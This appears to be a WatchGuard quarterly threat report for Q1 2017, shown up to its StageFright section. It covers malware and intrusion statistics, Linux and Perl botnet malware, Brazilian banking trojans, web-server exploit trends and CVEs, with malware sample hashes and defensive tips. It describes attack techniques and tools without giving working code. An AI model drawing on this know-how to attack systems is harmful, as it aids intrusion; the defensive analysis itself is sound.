quarter 1, 2017 - sc magazine · quarter 1, 2017 internet security report. internet security...

QUARTER 1, 2017

Internet Security Report

Internet Security Report: Q1 2017 • 2

Contents

Contents03 Introduction

04 Executive Summary

05 Firebox Feed Statistics

07 Malware Trends

08 Quarter-over-Quarter Malware Comparison

08 Malicious JavaScript Still Menaces

09 A Rise in Linux Malware

11 Evil Cross-platform Java Malware

11 Old Attacks: Malicious Perl Bot

12 A Pair of Generic Windows Trojans

12 Malicious Macros Hide in the Weeds

13 Geographic Malware Distribution

14 Zero Day vs Known Malware

15 Network Attack Trends

15 Top Network Attacks

16 Quarter-over-Quater Attack Comparison

16 Web Battleground Shifts to Servers

16 Web Application Attacks Move Up

17 StageFright Returns to the Spotlight

18 Geographic Attack Distribution 20 Firebox Feed Statistics: Defense Learnings

20 Malicious JavaScript in Email

20 Web-based Linux Malware

20 Brazilian Banking Malware Campaign

21 Top Security Incidents

22 The CIA Vault 7 Leaks

25 Marble Framework Defense Learnings

26 WatchGuard Threat Lab’s IoT Research Project

27 Responsible Disclosure: Ouvis C2 HD Security Camera

31 IoT Research: Defensive Learnings

32 Conclusion & Defense Highlights

Reset

A B

Reset

A B

The Firebox® Feed provides

quantifiable data and trends

about hackers’ latest attacks, and

understanding these trends can

help us improve our defenses.

Introduction


IntroductionHave you ever wondered what

types of cyber attacks affect small

to midsize businesses (SMBs) and

distributed enterprises (DEs)? Well,

you’ve come to the right place.

WatchGuard’s Internet Security Report is based on

Firebox Feed data coming from more than 26,000

unified threat management (UTM) appliances that

are monitoring and protecting SMBs and distributed

enterprises around the world. This data gives us

insights into what types of network exploits, malware

infections, and advanced attacks are launched by

cyber criminals every month, and how they change

and update their attacks over time. We share these

trends and insights with you every quarter in our

Internet Security Report.

The report for Q1 2017 includes:

Many trends and discoveries from the Firebox Feed What types of malware do we catch most

often in the wild? Which network services do

attackers commonly target? What are the

most popular attacks in different regions of the

world? Which delivery mechanisms do cyber

criminals most regularly rely on? You can learn

all this and more in our Firebox Feed Statistics

section.

Top Story: CIA Vault 7 leaks Every quarter, you’re flooded with interesting

and relevant information, security stories and

incidents. Some of them can have industry-

wide effects. This quarter our researchers

comment on the CIA Vault 7 leak from Q1 2016

and share some additional technical analysis

you didn’t see in the news.

Latest Internet of Things (IoT) research The WatchGuard Threat Lab constantly runs

security research projects to study the threats

and issues affecting businesses today. For

the last few quarters, our researchers have

been analyzing the security of consumer

IoT devices. This quarter we disclose a

vulnerability we found in the Ouvic C2 HD

Security Camera.

Most importantly, defensive learnings While some might consider the threat

landscape interesting on anecdotal merit

alone, you can put these trends and learnings

to good use. We share these trends and

findings so that you can cater your defenses to

the latest attacks. We share various protective

tips throughout this report, and summarize

with our top learnings.

05

11

22

33

We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional re-

search projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our

customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows

how attackers evolve their techniques and focuses over time. We hope this report provides useful information,

and you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and

read on for our latest threat landscape findings.

Summary


Even when malware declines, other attacks rise. Consumers and businesses are

under the constant deluge of network attacks, phishing, and malware. Criminals

target Brazilian banks, nation-states anonymize their tools, and advanced threats

get past legacy defenses. If you want to keep your business online, you need to

stay vigilant against these attack trends so you can identify defenses for them.

This report provides some details around those and other trends. Here’s a high-level summary of some of the

things you’ll learn from this report:

• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/Shellbot). We believe this increase comes from attackers targeting IoT devices.

• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, those misses increased 8% despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.

• Threat actors take a break from hacking the holidays. Overall, threat volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.

• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that always look for new victims.

• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).

• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.

• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.

• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email-based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banloader banking malware campaign.

Those are just a few of the many trends this report explores. Read on for more in-depth explanations and

Executive Summary

In Q1, 2017 WatchGuard blocked over 4,151,210

malware variants (156 per device)*

7,072,178 malware variants

(266 per device)*

* average per participating device


Firebox Feed Statistics




WatchGuard’s Firebox Feed provides quantifiable

data about the latest malware and network attacks

globally. The feed is a database of anonymized

threat data gathered from tens of thousands of

active Fireboxes around the globe. It records the

latest malware from our Gateway AntiVirus (GAV)

and APT Blocker services, and it archives the most

prevalent network attacks blocked by our Intrusion

Prevention Service (IPS) service. It also records

location data to learn how different threats affect

different geographic regions. It doesn’t, however,

capture any sensitive data about our customers’

networks or configurations, and allows customers to

optout of this feed whenever they like.

The Firefox Feed currently only captures data

from a fraction of our customers, since it relies

on customers running the latest versions of our

firmware. However, with information from over

26,000 devices, the Firebox Feed provides a

statistically relevant view into today’s threats.

This section of the report highlights the malware and

network attack trends our Firebox Feed uncovered in

Q1 2017. Here we share our analysis of these trends,

and provide defense tips that help you avoid the

latest malware and attacks.

This section of the report highlights the malware and network attack trends our Firebox Feed uncovered in Q1 2017. Here we share our analysis of these trends, and provide defense tips that help you avoid the latest malware and attacks.

The threat landscape does not stand still. Cyber criminals constantly change

their tools, tactics, and campaigns to exploit the most opportune attack

techniques of the time. Savvy attackers pay attention to seasonal events, pop

culture, and other technological trends to leverage the latest tricks to hack

more victims. To keep up your defenses, you must remain aware of the latest

threat trends. Using this report, you can fine-tune your defenses to block the

latest threats.

The information from over 26,000 devices, the Firebox feed provides a statistically relevant view into today’s threats.


Malware Trends


Looking at those numbers, the first thing you notice

is malware detection dropped by about half, despite

the Firebox Feed having almost two thousand more

devices reporting in. Why is that?

We suspect this decline has to do with the

seasonality of malware campaigns. The last quarter

of the year includes many regional and global

holidays, such as Thanksgiving and Christmas. Many

of these holidays involve major shopping periods and

retail events like Cyber Monday and Black Tuesday.

Due to this increased spending, attackers specifically

target these holiday and shopping periods, which

probably attributes for the higher malware rates last

quarter. As we continue our report annually, we’ll

follow this trend to see if holiday-related malware

increases are common year-over-year.

Besides the obvious decrease in overall malware, we

also noticed a relative increase in advanced malware.

While APT Blocker detections decreased in Q1, they

decreased relatively less compared to the decline in

GAV detections (a 34% decline compared to GAV’s

52%). In general, that means more malware got

past legacy AV this quarter, and required advanced

Generic Dropper

PERL IRC Bot

Malicious JavaScript

Generic Linux Trojan

Generic Trojan

Generic Linux Downloader

Malicious JavaScript

Generic Java Downloader

Generic Linux DDoS Tool

Generic Bitcoin Miner

CATEGORY

FakeAlert

PERL/ShellBot

JS/Downloader.Agent

Linux/Exploit

Win32/Heur

Linux/Downloader

JS/Heur

Java/Downloader

Linux/Flooder

Generic36.AAVT

THREAT NAME

670,261

356,809

256,390

178,551

165,996

158,689

156,645

83,123

82,127

77,704

COUNT

Most cyber attacks involve malware. After breaching your network, criminals

usually want to establish “persistence,” meaning they want to find a way to

retain access to your computer and network. Typically, they install malware to

retain this persistence. This section details the malware-specific trends from

our Q1 2017 data.

Figure 1: Top Ten Firebox GAV Hits for Q1 2017

Our malware data comes from two Firebox services:

• The basic Gateway AntiVirus (GAV) service,

which uses signatures and static heuristics to

catch known malware.

• APT Blocker, our advanced malware prevention

service, which uses behavior detection to catch

new or “zero day” malware.

Let’s start with the raw Q1 2017 numbers:

• The Firebox Feed recorded threat data from

26,584 active Fireboxes; a 7.7% increase in

devices reporting in Q4 2016.

• Our GAV service blocked 7,072,178 malware

variants; representing an average of 266 malware

samples blocked per Firebox. This represents a

52% decline in overall malware compared to last

quarter, and a 56% decline in malware blocked

per Firebox.

• APT Blocker stopped an additional 2,568,727

malware variants; representing a 34% decline

from last quarter.



malware detection techniques to block. This seems

to suggest that more threat actors are actively

creating malware that evades legacy protections.

Rather than analyzing these ten samples individually,

we’ll share the high-level trends they represent, and

go into more detail about some of the samples.

Quarter-Over-Quarter Malware Analysis

Only four of the malware samples from our Q4 2016

report made it to this quarter’s top ten. Specifically:

• FakeAlert

• Linux/Exploit

• JS/Downloader.Agent

• JS/Heur

Two of those threats traded places for relevance.

Last quarter, Linux/Exploit was the number one

threat, and a good indicator of increased IoT attacks.

This quarter, it’s still relevant, but has dropped below

FakeAlert, which took over the top spot. If you’d like

to know about either of these two samples, see the

malware section of last quarter’s Internet Security

Report. Meanwhile, the top JavaScript threats from

last quarter remain as relevant this quarter, which we

detail next.

Malicious JavaScript Still Menaces

JavaScript is a high-level scripting language most

commonly used on dynamic websites. While web

applications legitimately use JavaScript, attackers

commonly abuse it to help deliver malware.

Specifically, criminals tend to exploit malicious

JavaScript in two ways; either as malicious code

embedded on a website, or as malicious files sent via

email.

For the second quarter in a row, JavaScript malware

made up a large portion of the Firebox Feed top

statistics. Like last quarter, JS/Downloader.Agent and

JS/Heur both made our top ten list. Furthermore, we

continued to see many other malicious JavaScript

samples throughout our full top 100. In short, our

malware services block a lot of malicious JavaScript.

Network vs Endpoint Malware Detection:To evade detection technologies, modern malware

arrives in multiple stages. Rather than directly sending

you ransomware, attackers might send you a document,

that links to a website, that opens a malicious Java file,

that installs a dropper or downloader, which finally

downloads the actual ransomware onto the endpoint.

This means network AV solutions detect and block

malware at different stages in this deliver process than

endpoint AV. Network AV primarily “sees” the initial

droppers and downloaders from initial infection stages.

Whereas, endpoint AV may see the final malware.

For more on multi-stage malware, see this great post

from IBM X-Force.

As mentioned before, malicious JavaScript is either

hosted directly on a malicious website to facilitate

drive-by-download attacks, or delivered as an

attachment in a convincing phishing email. In the

email scenario, JavaScript malware typically acts

as the first-stage dropper in a multi-stage attack.

Malware authors hope their victims run the malicious

JavaScript so it can download the second stage

malware, which might be ransomware or a remote

access trojan (RAT).

In the case of web attacks, criminals use JavaScript

to launch browser and software exploits. In fact,

some of the samples our Fireboxes detected are

associated with web-based exploit kits like Angler,

Neutrino, and Rigs, which have previously delivered

ransomware like Locky and Nemucod.

Our data shows that malicious JavaScript plays a

big role in modern malware delivery, both over the

web and through email. Make sure you have security

controls that can identify malicious JavaScript,

including web reputation and advanced malware

protection services. We also encourage advanced

users to look into extensions like NoScript and

SafeScript, which can help you limit JavaScript while

also letting legitimate sites work. Finally, make sure

your users know never to open .JS files from an

email.

https://www.watchguard.com/wgrd-resource-center/security-report


https://en.wikipedia.org/wiki/Dropper_(malware)

http://www.christian-rossow.de/publications/downloaders-dimva12.pdf

https://securityintelligence.com/multistage-exploit-kits-boost-effective-malware-delivery/



A Rise in Linux Malware At least three of the top ten malware samples this

quarter target Linux, showing that cyber criminals

are focusing on this platform, likely for IoT-related

attacks.

Last quarter, Linux/Exploit was the number one

malware sample blocked. While it dropped to

number four this quarter, it’s joined by two other

Linux threats; Linux Downloader and Linux Flooder.

Combined, these three hits show attackers are

increasingly targeting Linux systems.

Here’s a quick description of each threat:

1. Linux/Exploit is a generic detection rule that

catches several executable Linux (ELF) trojans.

You can read more about it in our last report. In general, these trojans infect a device, and

then scan networks looking for any other

devices hosting Telnet or SSH services. Once

the Telnet or SSH host devices are identified,

the trojan attempts to log in to them using

default credentials or via brute force. Once

they have access, they hijack the device by

either downloading a copy of a malicious Linux

executable (which could be Linux/Exploit) or

by running a script to add the host to a growing

botnet (a la Mirai botnet).

Figure 2: Example of malicious Linux shell script caught by Linux/Downloader

RECENT SAMPLES:

78fae3e208de3bbadabe09f4996f0b44

cac62e5664152a357145747ba5dbe0a2

9a539a2aec2a815218abdf5c35b10c33

c92a0be3ff38cd24478ffcf8e35099c3

1a3029ed85c90411668583a9e271f0f5

ALTERNATE NAMES:

Linux/TrojanDownloader

Linux/ShellDLoader

Trojan-Downloader.Shell.Agent

Script.Trojan.Agent

RECENT SAMPLES:c9c50c4b28d5209c2366ac4ec531ae0c

a3b3572cccac880e33420316562814ce

e9b5716cac7e5e0df3a209456294a34c

ALTERNATE NAMES: Linux.CornelGEN

2. Linux/Downloader joined the top ten malware

list this quarter. Linux/Downloader is a signature

that generically catches common Linux dropper

or downloader shell scripts. Rather than catching

malicious Linux executables (ELF files) like Linux/

Exploit, this signature catches the malicious shell

scripts that some attackers (or trojans) run to

download and install additional malware onto a

hijacked Linux device.

Linux runs on many different architectures, such

as ARM, MIPS, and traditional x86 chipsets.

An executable compiled for one architecture

will not run on a device running a different

one. Thus, some Linux attacks exploit dropper

shell scripts to download and install the proper

malicious components for the architecture they

are infecting. Here’s a sample of one of the

many Linux downloader scripts caught by this

signature.

12




3. Linux/Flooder also joined the Q1 top ten malware

list. This is another generic signature that

catches Linux-based distributed denial of service

(DDoS) tools. For instance, it catches tools like

the publicly released Tsunami tool. Tsunami is a

command line Linux tool designed to carry out

DNS amplification attacks. It’s based on an open

source DNS relay scanner called namescan. This

is one of the many possible Linux-based CLI

DDoS tools.

Linux/Flooder may also catch the DDoS tools

used by Linux-based botnets, like Mirai. As the

Mirai botnet showed us, Linux-based IoT devices

are a prime target for botnet armies. These

networked trojans often include tools for DDoS

attacks, as shown below.

RECENT SAMPLES:

3c0e9dbc29b74445664814b10b2ced82

bb326e31fdfc533e3e5293df13bb091a

e64079b3ccf906204474beca1f5cc41d

cc38121ea8efc86bcc5d446e2f7e4198

ALTERNATE NAMES:

Dos.Linux.Agent

Linux.Flood

Trojan.Linux.Flooder

Linux/Dnsamp

Linux.BackDoor.Tsunami

3

As an aside, one might argue that the PERL/ShellBot

variant we describe below also qualifies as Linux

malware, since it primarily targets Linux systems.

This is because they tend to have Perl installed by

default. However, we decided to leave it out of this

section, and describe it in more detail later in this

report.

In summary, Linux attacks and malware are on the

rise. We believe this is because systemic weaknesses

in IoT devices, paired with their rapid growth, are

steering botnet authors towards the Linux platform.

Owners of Linux-based devices, including IoT hosts

and traditional Linux servers, should ensure they

properly secure their systems from external attacks.

Blocking inbound Telnet and SSH, along with using

complex administrative passwords, can prevent the

vast majority of potential attacks.

Figure 3: Mirai Command and Control Server

Linux



Evil Cross-platform Java Malware

Java is a general-purpose programming language

that is designed to run on many platforms.

Originally created by Sun Microsystems (now

owned by Oracle), Java is one of the most popular

programming languages used today. Everything from

web applications, to mobile devices, to normal client

software uses Java. People often confuse Java for

Javascript, but they are quite different. Javascript is

a high-level, runtime scripting language.

Unfortunately, Java has also developed a reputation

of insecurity. Over the years, researchers have

found countless vulnerabilities in the Java platform,

many of which allow attackers to bypass its

built-in sandbox, which is there to protect users.

Furthermore, sophisticated attackers are drawn

to Java because it runs equally well on Windows,

Mac, and Linux devices. Attackers exploit Java

downloaders in cross-platform attacks.

While Java threats were very common a few years

ago, this is the first time we’ve seen a Java threat

make our top ten list. Java/Downloader is a universal

signature that detects generic Java downloaders.

These bits of malicious code try to fingerprint a

victim’s operating system (OS), and then install the

corresponding malicious payload.

The most recent samples caught by Java/

Downloader are associated with a cross-platform

trojan called Banload, which targets South American

banks. This banking trojan infects both Windows and

Macintosh computers using this malicious Java code.

Our geographic data confirms this increase likely

relates to a South American bank attack campaign.

We’ll share more about this in our Geographic

Distribution section.

Old Attacks: Malicious Perl Shellbots

Last quarter, an old-style threat called a PHP

webshell made our top ten malware list. This quarter

that threat dropped entirely off our top 100 list,

only to get replaced with another outdated threat –

PERL/ShellBot.

PERL/ShellBot is a broad signature made to

detect malicious bots written in Perl (a high-level

programming language). Though Perl bots can run

on any platform with Perl installed, they tend to

affect Linux computers because they often install

Perl by default.

These malicious bots use the Internet Relay Chat

(IRC) service as a command and control (C&C)

channel for the attacker. Some of these malicious

Perl shellbots connect to IRC using the default port,

6667. However, others use non-standard IRC ports

like 23, or 3333, presumably to help avoid detection.

Like a normal botnet, attackers can leverage Perl

bots for just about any nefarious purpose, including

but not limited to DDoS attacks. Source code for

many Perl Shellbots have leaked publicly, resulting

in many variants based on the originals. Below is a

Github for one such sample used in for DDoS attacks.

JAVA/DOWNLOADER INFO: • Generic Java downloader

• Related to banking malware (Banload)

• Sample hashes: 2c1189b57ff0cfdd18618f51955df8f1 cb6d19921c635683798b4dcc86fe607f 4478732742b8ccbf252cbb71766eb86 f27b92b58f510932cd117c4248955c9 e9d0672646d0478b0b3a8a3d334ee32 ccfcf52d14a07e2d7fb780809e6b6b73

• Alternate names: Java.Trojan.Generic Java:Malware-gen Java/Banload.U Mal/DrodZp-A TrojanDownloader.Java

PERL/SHELLBOT INFO: • Perl-based IRC bot

• Related to ShellShock attack

• Sample hashes: 59b0f479a5ad937dd9d61635c4c855bc 66d85817e183b3e5120149721d3fcc19 1d37072882034f5a015fd3430f8169a7 8a838c86c038713b083b6fc07208ebc3 fe3323a44f0f536b94947dce2b229fc4

• Alternate names: Backdoor.Perl.Shellbot Unix/ShellBot Trojan.Perl.Shellbot

https://en.wikipedia.org/wiki/Java_(programming_language)

https://en.wikipedia.org/wiki/Criticism_of_Java#Security

https://en.wikipedia.org/wiki/Criticism_of_Java#Security

https://en.wikipedia.org/wiki/Perl

https://en.wikipedia.org/wiki/Internet_Relay_Chat

https://en.wikipedia.org/wiki/Perl



Figure 4: Example of publicly available DDoS Perl bot

In late 2014, a critical Linux Bash vulnerability sur-

faced called ShellShock. This flaw made it trivial for

attackers to gain full root privileges on any Linux

server that exposed Bash. At the time, attackers

updated their malicious Perl bots to target this

ShellShock vulnerability. Some of the samples we see

associated with recent PERL/ShellBot detections are

targeting this ShellShock vulnerability. If you haven’t

already patched your Linux systems for ShellShock,

you should do so immediately.

A Pair of Generic Windows Trojans To round out our top ten list, we also saw a pair of

signatures that catch generic Windows trojans.

• Win32/Heur is about as generic a signature as

you get, and is known to catch many Windows-

based trojans, from Zbot and Zeus to Razy.

• Generic36.AAVT is also a broad signature that

catches Windows-specific malware. However, it’s

more specifically associated with Bitcoin Miner

trojans. This suggests a slight uptick in attackers

delivering Bitcoin mining malware in some

regions.

Malicious Macros Hide in the WeedsUnlike last quarter, malicious macro-based Word

documents did not make our top ten list. There was a

clear decline in overall malicious macro documents in

Q1. However, they’re still worth mentioning since we

see these malicious documents sprinkled throughout

our wider top 100 list.

Despite their decline, we recommend you continue

to warn your users against unsolicited documents,

and tell them not to enable macros if they do open

strange documents. See our last report for more

information on this waning threat.

https://en.wikipedia.org/wiki/Bash_(Unix_shell)

https://www.secplicity.org/2014/09/26/shellshock-wswir-episode-123/




Figure 5: Malware detection by region

EMEA

56.6%AMERICAS

21.8%APAC

21.6%

Geographic Malware DistributionOverall, we see more malware blocked in EMEA than

anywhere else, with over 56% of malware caught in

this region. This continues the same overall regional

trend from last quarter. While this could have to do

with the sales and licensing of our products (APT

Blocker is popular in Europe), it could also suggest

criminals are launching more European malware

campaigns.

Our regional trends change for the remaining per-

centage of malware though. Last quarter, most of

the remaining malware affected the Americas, with

only 6% of malware found in APAC. This quarter,

the remaining malware is split evenly between the

Americas and APAC, at approximately 22% each. This

marks a significant increase in threats affecting the

Asia-Pacific.

We also saw quite a few standout geographic trends

for individual malware variants:

1. We primarily found PERL/ShellBot in two

countries. 53% of the hits were found in Malaysia,

36.7% were found in the United States, and the

remaining 10.3% was distributed throughout

eleven other countries. It’s unclear why these

Perl bots are primarily targeting Malaysia and the

United States.

2. 84% of Win32/Heur was found in India.

3. The generic Bitcoin miner (Generic36.AAVT)

primarily targeted Canada, with 95% of the

detections.

4. 97% of our Java/Downloader detections were

from Brazil, confirming this threat is associated

with a known banking malware campaign targeting Brazilian banks.

5. The Linux threats display a wide range of

geographic curiosities.

a. Linux/Exploit affected many European and

American countries, but had the highest

numbers in the U.S. and United Emirates.

b. Linux/Downloader mostly affected Germany,

Great Britain, and Malaysia, but few others

to the same extent.

c. Finally, Linux/Flooder primarily affected

Germany and France.

6. The JavaScript malware was found in a wide

range of countries, but Germany always lead the

list.

7. Though FakeAlert was found in over 100

countries, 44% came from Italy.

Malware affects all countries to some extent, but it is

interesting to see certain threats only affect specific

countries or regions. Pay close attention to the most

prominent threats by region, and consider adjusting

your defenses accordingly.

Though FakeAlert was found in over

100 countries, 44% came from Italy.

https://en.wikipedia.org/wiki/Europe,_the_Middle_East_and_Africa

https://en.wikipedia.org/wiki/Asia-Pacific

http://newsroom.kaspersky.eu/en/texts/detail/article/kaspersky-lab-detects-banking-trojan-with-potential-for-multi-platform-capability

http://newsroom.kaspersky.eu/en/texts/detail/article/kaspersky-lab-detects-banking-trojan-with-potential-for-multi-platform-capability

Internet Security Report: Q1 2017 • 14Internet Security Report: Q1 2017 • 14


GAV found 4,198,242 known malware

variants on boxes that also had APT Blocker.

Meanwhile, APT Blocker prevented 2,568,021 new malware variants on these same devices.

Zero Day vs Known MalwareAs mentioned in the sidebar above, Firebox custom-

ers can also use our optional APT Blocker service

to catch more advanced malware. APT Blocker runs

suspicious files in a next-generation cloud sandbox,

and monitors their behaviors to identify zero day

malware that would be missed by signature-based

detection solutions. When our GAV service doesn’t

detect anything bad, our Firebox can still run addi-

tional APT Blocker checks to find brand new threats.

By definition, if APT Blocker catches a threat, signa-

ture-based GAV missed it. By comparing these two

services, you get a good idea of the ratio between

newer “zero day malware,” which legacy AV solutions

might miss, compared to known malware.

That said, not all our customers have APT Blocker.

For a one-to-one comparison, we count the total

GAV hits only on boxes that have APT Blocker.

According to our Firebox Feed, GAV found 4,198,242

known malware variants on boxes that also had APT

Blocker. Meanwhile, APT Blocker prevented 2,568,021

new malware variants on these same devices. This

means at least 38% of the malware our systems

discovered was zero day, and missed by legacy AV

solutions.

This illustrates the critical importance of advanced,

behavioral-based malware detection solutions today.

Without them, AV solutions could miss more than

one third of the malware spreading online. This is

why so many networks that use basic AV become

victims of threats like ransomware. We highly recom-

mend you leverage advanced malware solutions like

WatchGuard’s APT Blocker.

OF MALWARE WAS38%ZERO DAY

Figure 6: Known vs Zero Day Malware


At a high level, our IPS service blocked 4,151,210

network attacks, which averages to 156 intrusion

attempts per Firebox customer. This represents

around a 37% increase in the overall blocked network

attacks this quarter compared to Q4. While cyber

criminals may not have launched as many massive

malware campaigns, it appears that other types of

attacks are on the rise.

Network Attack Trends

Threat Affected CVE Signature Name Category Products Number Count

WEB URI Handler Buffer Web Server Windows web serverss CVE-2011-1965 532,565 Overflow - POST -1

WEB HTTP Basic Authorization Web Server All web servers CVE-2009-0183 192,899 Header Buffer Overflow

WEB Nginx HTTP_parse_chunked Web Server Nginx CVE-2013-2028 118,576 Buffer Overflow(1)

WEB HTTP Host Header Web Server Apache CVE-2003-0245 117,706 Buffer Overflow

WEB Cross-site Scripting -36 Web Client Any web application CVE-2011-2133 115,446

WEB Brute Force Login -1 Web Server Web app logins n/a 68,806

WEB-CLIENT Javascript Web Client All web browsers Multiple CVEs 49,376 Obfuscation in EKs - 75

WEB NetBSD tnftp fetch Web-based FTP tnftp (Apple, NetBSD, Linux) CVE-2014-8517 47,076 _url Command Execution(2)

WEB-CLIENT Javascript Web Client All web browsers n/a 36,874 Command Execution(2)

Android libstagefright mp4 tx3g Android buffer Android OS CVE-2015-3824 31,085 Atom Multiple Buffer Overflow -1 overflow

Figure 7: Top Ten IPS Hits Q1 2017

40.6% 14.7% 9% 3.8%8.8% 2.8%9% 3.6%5.3% 2.4%WEB URI

Handler Buffer Overflow - POST - 1

WEB HTTP Basic Auth

Header Buffer Overflow

WEB Nginx HTTP_parse_

chunked Buffer Overflow(1)

WEB-CLIENT Javascript

Obfuscation in EKs - 75

WEB Cross-site Scripting -36

WEB-CLIENT Suspicious

HTML Iframe Tag(4)

WEB HTTP Host Header

Buffer Overflow

WEB-CLIENT WEB NetBSD tnftp fetch_url

Command Execution(2)

WEB Brute Force Login -1

Android libstagefright

mp4 tx3g Atom Multiple Buffer

Overflow -1

Network Attack TrendsTo deliver malware, attackers must either rely on the mistakes of users, or

take advantage of vulnerabilities found in network software. In the case of

software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is

designed to detect these client and server-side exploits, and prevent them

from working. This section of the report highlights the top network attacks.

Below are the top network threats seen during this

period.

Rather than analyzing each individual exploit (see

the links in the chart if you want more detail), let’s

look at quarter-over-quarter differences and overall

trends.

https://www.watchguard.com/SecurityPortal/ThreatDetail.aspx?rule_id=1120193

https://nvd.nist.gov/vuln/detail/CVE-2011-1965



http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0183


http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2028


https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0245







https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8517








Quarter-Over-Quarter Attack AnalysisIn Q1, six of the network attacks from previous quar-

ter return to our top list. At a high level, not much

has changed with these six attacks. Almost all of

them moved up on the list, and they generally retain

the same order. The only exception is the “Suspicious

HTML iframe tag” issue, which dropped two spots to

ninth. While web-based attacks still dominate the top

threats, the scale has tipped from web client attacks

to web server attacks, which we will talk about next.

The Web Battleground Shifts to ServersLast quarter, web attacks dominated our top ten, fill-

ing all the spots on our list. This quarter, web threats

still dominate, but a mobile exploit cracked the top

10 for the first time. This quarter also saw a shift in

the type of web attacks. In Q4 2016, 73% of the top

web attacks targeted web clients (the browser and

its supporting software), not web servers. Now, only

three of the nine web threats on the list target web

clients. In the end, 82% of the top network attacks

target web servers (or web-based services).

This marks a significant shift in the mix of web server

vs client threats, and that trend extends into the top

20 as well. While a few more client vulnerabilities

show up in the wider top 20 list, it also includes more

web server flaws. We don’t think drive-by download

style attacks will go away, but it appears attackers

have focused their efforts and tools on trying to

exploit web server attacks. A couple of new web

server attacks also made the list, which we’ll cover

next. With the increase in web server attacks, we

recommend you harden your web servers, use a fire-

wall to limit access to any internal web services, and

keep your server software up to date with the latest

patches.

Web Application Attacks Move UpThough many of the web vulnerabilities in the top

threat list remain the same, Q1 saw two newcomers a

web application vulnerability and a login brute force

attack:

1. WEB Cross-site Scripting – 36: A web

application (app) vulnerability is a flaw in the

actual web app, and not in the server software.

This could include the code making up a common

web framework you use, or the custom code

you created specifically for your own web apps.

Common examples of web app flaws include

cross-site scripting (XSS), local and remote file inclusion, SQL injection (SQLi), cross-site request forgery (CSRF), and many more.

Last quarter, not a single web app vulnerability

made the top 10. This quarter, an XSS

vulnerability rose to number five. An XSS attack

allows an attacker to interact with a web app

as if they are the intended end user. However,

attackers typically need to trick you into clicking

a specially crafted link for the attack to work.

If you do fall for the link, the attacker can gain

access to that web app’s cookies, and any of your

other content on that site.

WEB Cross-site Scripting – 36 is one of many

broad signatures to detect generic cross-

site scripting attempts against your users. It’s

interesting to see web app attacks reach the top

10. We found three additional web app attacks in

the top 20 as well. Protecting against XSS attacks

is a twofold process, since the vulnerability lies

in a server web app, but the attack targets a web

client. For web app administrators, you should

visit OWASP.org to learn how to develop security

web apps (a broad topic we can’t cover in a short

report). For web users, you should be very careful

clicking unusual links.

2. WEB Brute Force Login – 1: While it doesn’t

technically catch a web app vulnerability, the

Brute Force Login IPS rule does catch an attack

that targets the login pages of web applications.

If you don’t program login throttling to your web

application, attackers can use tools like THC Hydra or the Burp Suite to try and brute force

user accounts on your website. This IPS rule can

catch web login brute force attempts by looking

for repeated connections from the same source

address.

With the increase in web app vulnerabilities in Q1,

we recommend web administrators audit their source

code. As mentioned earlier, OWASP.org is a great

resource for learning about protecting your web

applications.

http://www.watchguard.com/wgrd-resource-center/network-security-glossary#XSS

https://en.wikipedia.org/wiki/Local_File_Inclusion

https://en.wikipedia.org/wiki/Local_File_Inclusion

https://www.owasp.org/index.php/SQL_Injection

https://www.owasp.org/index.php/SQL_Injection

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

https://www.owasp.org/index.php/Main_Page

http://sectools.org/tool/hydra/

http://sectools.org/tool/hydra/

https://portswigger.net/burp/

https://www.owasp.org/index.php/Main_Page



StageFright Returns to the SpotlightAs previously mentioned, this quarter included

the first mobile-specific exploit to crack the top

threats list. StageFright is an exploit that targets

Android mobile devices and it first earned notoriety

in 2015 when researchers publicly disclosed it prior

to the BlackHat security conference. Specifically,

StageFright is a buffer overflow vulnerability in the

Android libStageFright system module, responsible

for handling video messages in Android mobiles. By

sending a carefully crafted video message, an attack-

er can exploit this buffer overflow to either execute

arbitrary code on the mobile device with full root

privileges, or at least cause the device to crash. You

can learn more about it in this Daily Byte video.

Over the course of 2015, various Android platforms

patched StageFright. However, not all users or ven-

dors keep their Android installs up to date, so many

mobile devices may remain vulnerable. Our Stage-

Fright signature catches some of the malicious MP4

files used to trigger this video-handling vulnerability.

It’s interesting to see this mobile threat make our top

attack list. Nearly two years later, not only is Stage-

Fright still present, but it’s prolific.

If you are worried about this mobile threat, we highly

recommend upgrading your Android operating

system (if it’s not patched already). Barring that,

some third-party texting applications can mitigate

the risk of StageFright by preventing mobile devic-

es from processing video messages automatically.

These applications will now ask whether you want to

download and play video messages. You should train

your users to treat all unsolicited video messages as

suspicious, and avoid clicking links or downloading

files you don’t expect.

In summary, the web is still the battleground but the

conflict has shifted vulnerabilities from the client to

the server. If you are a web administrator, use this as

an excuse to circle back and reevaluate your security

for web servers and applications.

By Source (WP:NFCC#4), Fair use, https://en.wikipedia.org/w/index.php?curid=47364979

https://en.wikipedia.org/wiki/Stagefright_(bug)

https://www.watchguard.com/wgrd-resource-center/network-security-glossary#buffer_overflow

https://android.googlesource.com/platform/frameworks/av/+/master/media/libstagefright



